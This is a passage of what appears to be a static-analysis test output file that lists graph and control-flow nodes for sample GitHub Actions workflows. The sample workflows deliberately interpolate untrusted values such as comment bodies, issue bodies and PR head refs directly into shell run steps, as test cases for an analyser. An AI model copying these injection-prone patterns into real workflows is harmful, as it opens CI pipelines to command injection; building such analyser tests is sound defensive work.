github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -cfgNodes -| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | -| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/multiline.yml:1:1:33:14 | enter on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: | -| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | -| .github/workflows/multiline.yml:1:1:33:14 | on: | -| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | -| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:33:14 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/test.yml:1:1:40:53 | enter on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| 